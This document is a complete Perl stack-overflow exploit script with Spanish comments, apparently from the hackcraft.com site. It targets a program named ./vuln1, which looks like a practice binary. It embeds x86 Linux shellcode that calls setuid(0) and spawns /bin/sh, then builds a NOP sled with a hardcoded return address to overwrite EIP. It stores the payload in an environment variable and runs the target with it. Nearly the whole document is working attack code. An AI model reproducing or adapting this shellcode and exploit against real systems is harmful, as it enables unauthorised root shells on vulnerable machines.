BOF ~~~~~~~ #!/usr/bin/perl $shellcode = # HACKCRAFT shellcode "\x31\xc0\x31\xdb\x31\xd2\x53\x68\x54\x20\x20\x0a". "\x68\x43\x52\x41\x46\x68\x48\x41\x43\x4b\x89\xe1". "\xb2\x0f\xb0\x04\xcd\x80\x31\xc0\x31\xc0\x31\xdb". "\x31\xc9\xb0\x17\xcd\x80\x31\xc0\x50\x68\x6e\x2f". "\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x8d\x54\x24". "\x08\x50\x53\x8d\x0c\x24\xb0\x0b\xcd\x80\x31\xc0". "\xb0\x01\xcd\x80\x5d\xc3\x8d\x76\x00"; # $len = 1024 + 8; # La longitud necesaria para sobreescribir EIP. $len = 520 + 8; # $ret = 0xbffffc03; # Mi Stack pointer despues de VIOLACION DE # SEGMENTO (info reg ESP) $ret = 0xbffffccf; # Aca esta el inicio de los NOPs EXACTAMENTE $nop = "\x90"; # x86 NOP $offset = 0; # Default offset to try. print("=================================================================\n"); print(" Stack Overflow Exploit \n\n"); print(" by Hugo Mart?n [ www.hackcraft.com ] \n"); print("=================================================================\n"); if (@ARGV == 1) { $offset = $ARGV[0]; } print("Usando el offset : $offset \n"); $c=0; for ($i = 0; $i < ($len - length($shellcode) - 100); $i++) { $buffer .= $nop; $c++; } # [ Buffer: NNNNNNNNNNNNNN ] $buffer .= $shellcode; # [ Buffer: NNNNNNNNNNNNNNSSSSS ] print("Address: 0x", sprintf('%lx',($ret + $offset)),"\n"); $new_ret = pack('l', ($ret + $offset)); for ($i += length($shellcode); $i < $len; $i += 4) { $buffer .= $new_ret; } # [ Buffer: NNNNNNNNNNNNNNNNSSSSSRRRRRR ] $lshellcode=length($shellcode); print("\n\nDATA:\n"); print("Longitud del shellcode: $lshellcode \n"); print("buffer specially crafted : $buffer \n"); print("cantidad de NOPs: $c \n\n\n"); local($ENV{'KIDVULN'}) = $buffer; exec("./vuln1 '$buffer'"); # Copia el shellcode en la variable KIDVULN para # incrementar las posibilidades de encontrar el offset # (RET), y ejecuta vuln. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ www.hackcraft.com